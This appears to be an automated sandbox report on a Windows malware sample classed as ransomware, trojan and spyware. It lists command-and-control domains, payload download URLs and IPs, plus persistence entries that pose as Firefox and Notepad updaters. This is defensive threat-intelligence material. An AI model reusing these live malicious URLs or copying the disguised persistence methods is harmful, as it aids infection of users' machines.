          17.2.E4.exe.640e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          SourceDetectionScannerLabelLink
          perficut.at1%VirustotalBrowse
          potunulit.org17%VirustotalBrowse
          siaoheg.aappatey.com0%VirustotalBrowse
          flytourchip.com.br0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://potunulit.org/0%URL Reputationsafe
          http://soryytlic4.net/0%URL Reputationsafe
          http://siaoheg.aappatey.com/0%URL Reputationsafe
          http://novanosa5org.org/0%URL Reputationsafe
          http://golilopaster.org/0%URL Reputationsafe
          http://iueg.aappatey.com:80/check/safe0%URL Reputationsafe
          https://xv.yxzgamen.com/2701.html100%URL Reputationmalware
          http://bulimu55t.net/0%URL Reputationsafe
          https://xv.yxzgamen.com/logo.png100%URL Reputationmalware
          http://iueg.aappatey.com/check/safe0%URL Reputationsafe
          http://hujukui3.net/0%URL Reputationsafe
          http://77.73.134.27/llpb1133.exe100%URL Reputationmalware
          http://bukubuka1.net/0%URL Reputationsafe
          http://newzelannd66.org/0%URL Reputationsafe
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
          http://iueg.aappatey.com/check/safeXdkojlmpp0%Avira URL Cloudsafe
          http://62.204.41.134/_0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef0%Avira URL Cloudsafe
          http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e60440%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/r0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/K0%Avira URL Cloudsafe
          http://perficut.at/0%Avira URL Cloudsafe
          http://perficut.at/tmp/0%Avira URL Cloudsafe
          https://flytourchip.com.br/systems/ChromeSetup.exe0%Avira URL Cloudsafe
          http://iueg.aappatey.com/check/safeB0%Avira URL Cloudsafe
          http://bihsy.com/lancer/get.php100%Avira URL Cloudmalware
          http://iueg.aappatey.com/m0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675preseMu0%Avira URL Cloudsafe
          http://62.204.41.134/0%Avira URL Cloudsafe
          http://perw.facebook.cueg.aappatey.com/check/safe0%Avira URL Cloudsafe
          http://iueg.aappatey.com/check/safei0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b56750%Avira URL Cloudsafe
          http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e6040%Avira URL Cloudsafe
          http://siaoheg.aappatey.com:80/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675?0%Avira URL Cloudsafe
          http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604o0%Avira URL Cloudsafe
          http://62.204.41.134/ll0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcfBb4E40%Avira URL Cloudsafe
          http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604n0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f60%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcohor0%Avira URL Cloudsafe
          http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675c0%Avira URL Cloudsafe
          http://iueg.aapp0%Avira URL Cloudsafe
          http://iueg.aappatey.com/check/safeT7-16b8-40%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          star-mini.c10r.facebook.com
          157.240.253.35
          truefalse
            high
            perficut.at
            195.158.3.162
            truetrueunknown
            potunulit.org
            188.114.96.3
            truetrueunknown
            siaoheg.aappatey.com
            45.66.159.142
            truefalseunknown
            api.2ip.ua
            162.0.217.254
            truefalse
              high
              flytourchip.com.br
              158.69.96.67
              truetrueunknown
              xv.yxzgamen.com
              188.114.97.3
              truefalse
                unknown
                iueg.aappatey.com
                45.66.159.142
                truefalse
                  unknown
                  www.facebook.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://flytourchip.com.br/systems/ChromeSetup.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    http://perficut.at/tmp/true
                    • Avira URL Cloud: safe
                    unknown
                    http://potunulit.org/true
                    • URL Reputation: safe
                    unknown
                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingfalse
                      high
                      http://soryytlic4.net/true
                      • URL Reputation: safe
                      unknown
                      http://novanosa5org.org/true
                      • URL Reputation: safe
                      unknown
                      http://golilopaster.org/true
                      • URL Reputation: safe
                      unknown
                      http://bihsy.com/lancer/get.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://62.204.41.134/false
                      • Avira URL Cloud: safe
                      unknown
                      https://xv.yxzgamen.com/2701.htmltrue
                      • URL Reputation: malware
                      unknown
                      http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604false
                      • Avira URL Cloud: safe
                      unknown
                      http://bulimu55t.net/true
                      • URL Reputation: safe
                      unknown
                      https://xv.yxzgamen.com/logo.pngtrue
                      • URL Reputation: malware
                      unknown
                      https://api.2ip.ua/geo.jsonfalse
                        high
                        http://siaoheg.aappatey.com/check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f6false
                        • Avira URL Cloud: safe
                        unknown
                        http://iueg.aappatey.com/check/safefalse
                        • URL Reputation: safe
                        unknown
                        http://hujukui3.net/true
                        • URL Reputation: safe
                        unknown
                        https://www.facebook.com/ads/manager/account_settings/account_billingfalse
                          high
                          http://77.73.134.27/llpb1133.exetrue
                          • URL Reputation: malware
                          unknown
                          http://bukubuka1.net/true
                          • URL Reputation: safe
                          unknown
                          http://newzelannd66.org/true
                          • URL Reputation: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yX/l/en_US/WYC6LbamQUd.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e6044D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://siaoheg.aappatey.com/Kllpb1133.exe, 00000014.00000002.602167234.00000000004BA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/ac/?q=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://62.204.41.134/_D8D3.exe, 00000013.00000003.441885976.000000000085F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://messenger.com/98D7.exe, 00000010.00000003.474645572.0000000002892000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://search.yahoo.com?fr=crmas_sfpfD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.openssl.org/support/faq.html3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmpfalse
                                      high
                                      http://iueg.aappatey.com/check/safeXdkojlmpp98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://siaoheg.aappatey.com/r98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://static.xx.fbcdn.net/rsrc.php/v3/yR/r/n9ktzHPknGx.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://perficut.at/98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://siaoheg.aappatey.com/98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://siaoheg.aappatey.com:80/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://iueg.aappatey.com/check/safeB98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/098D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://iueg.aappatey.com:80/check/safe98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://iueg.aappatey.com/m98D7.exe, 00000010.00000003.492565099.00000000004C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/4x04rJtLVMo.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.476889083.000000000288E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675preseMullpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/mkZZ0EnRB0x.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://iueg.aappatey.com/check/safei98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.303832836.000000000F270000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/ue_OWlkLDZP.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://perw.facebook.cueg.aappatey.com/check/safe98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675?llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://62.204.41.134/llD8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604oD8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604nD8D3.exe, 00000013.00000003.514324898.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://iueg.aappatey.com/check/safeT7-16b8-4llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcfBb4E498D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcohor98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/2Z9gzYPL3TW.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ac.ecosia.org/autocomplete?q=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://search.yahoo.com?fr=crmas_sfpD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/qu9vi-bmWl3.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675cllpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://iueg.aapp98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    37.34.248.24
                                                                                    unknownKuwait
                                                                                    42961GPRS-ASZAINKWtrue
                                                                                    190.219.54.242
                                                                                    unknownPanama
                                                                                    18809CableOndaPAtrue
                                                                                    23.106.124.133
                                                                                    unknownSingapore
                                                                                    59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                    45.66.159.142
                                                                                    siaoheg.aappatey.comRussian Federation
                                                                                    18978ENZUINC-USfalse
                                                                                    62.204.41.134
                                                                                    unknownUnited Kingdom
                                                                                    30798TNNET-ASTNNetOyMainnetworkFIfalse
                                                                                    195.158.3.162
                                                                                    perficut.atUzbekistan
                                                                                    8193BRM-ASUZtrue
                                                                                    188.114.97.3
                                                                                    xv.yxzgamen.comEuropean Union
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    158.69.96.67
                                                                                    flytourchip.com.brCanada
                                                                                    16276OVHFRtrue
                                                                                    188.114.96.3
                                                                                    potunulit.orgEuropean Union
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    77.73.134.27
                                                                                    unknownKazakhstan
                                                                                    206751FIBEROPTIXDEtrue
                                                                                    162.0.217.254
                                                                                    api.2ip.uaCanada
                                                                                    35893ACPCAfalse
                                                                                    157.240.253.35
                                                                                    star-mini.c10r.facebook.comUnited States
                                                                                    32934FACEBOOKUSfalse
                                                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                    Analysis ID:800784
                                                                                    Start date and time:2023-02-07 19:42:59 +01:00
                                                                                    Joe Sandbox Product:CloudBasic
                                                                                    Overall analysis duration:0h 13m 47s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                    Number of analysed new started processes analysed:41
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • HDC enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample file name:file.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.rans.troj.spyw.evad.winEXE@40/35@15/12
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 50%
                                                                                    HDC Information:
                                                                                    • Successful, ratio: 74.5% (good quality ratio 66.5%)
                                                                                    • Quality average: 67.2%
                                                                                    • Quality standard deviation: 33.7%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 16
                                                                                    • Number of non-executed functions: 68
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, g.agametog.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                                                                                    • Execution Graph export aborted for target 4113.exe, PID 4968 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    TimeTypeDescription
                                                                                    19:44:11API Interceptor759x Sleep call for process: explorer.exe modified
                                                                                    19:44:47Task SchedulerRun new task: Firefox Default Browser Agent 965BA40FEDD9AA3B path: C:\Users\user\AppData\Roaming\sievwvt
                                                                                    19:45:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
                                                                                    19:45:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
                                                                                    19:45:28Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe s>--Task
                                                                                    19:45:41API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                    19:45:44API Interceptor9x Sleep call for process: 98D7.exe modified
                                                                                    19:45:47API Interceptor4x Sleep call for process: pliu.exe modified
                                                                                    19:45:55Task SchedulerRun new task: Firefox Default Browser Agent 71F89663E6ACBAD9 path: C:\Users\user\AppData\Roaming\jhevwvt
                                                                                    19:46:06API Interceptor4x Sleep call for process: llpb1133.exe modified
                                                                                    19:46:44Task SchedulerRun new task: NoteUpdateTaskMachineQC path: C:\Program Files\Notepad\Chrome\updater.exe
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    37.34.248.24gA0GfbWvge.exeGet hashmaliciousBrowse
                                                                                    • bihsy.com/files/1/build3.exe
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • perficut.at/tmp/
                                                                                    xdAzYGAuKY.exeGet hashmaliciousBrowse
                                                                                    • perficut.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • perficut.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • perficut.at/tmp/
                                                                                    2x7Psl9wkV.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    eTj7a3jKP2.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    IRTCAnrIZY.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • mightys.at/tmp/
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    perficut.atxakJ7het39.exeGet hashmaliciousBrowse
                                                                                    • 211.40.39.251
                                                                                    ePaQLI5RyP.exeGet hashmaliciousBrowse
                                                                                    • 203.91.116.53
                                                                                    z3tYlqYItl.exeGet hashmaliciousBrowse
                                                                                    • 190.229.19.7
                                                                                    jGQGty5EA2.exeGet hashmaliciousBrowse
                                                                                    • 187.170.238.164
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 190.140.74.43
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 178.31.136.92
                                                                                    HnS2IuLJaQ.exeGet hashmaliciousBrowse
                                                                                    • 211.40.39.251
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 190.117.75.91
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 190.219.54.242
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 211.171.233.126
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 222.236.49.123
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 190.140.74.43
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 211.53.230.67
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 187.232.181.153
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 210.182.29.70
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 211.171.233.129
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 186.182.55.44
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 203.91.116.53
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 190.141.35.3
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
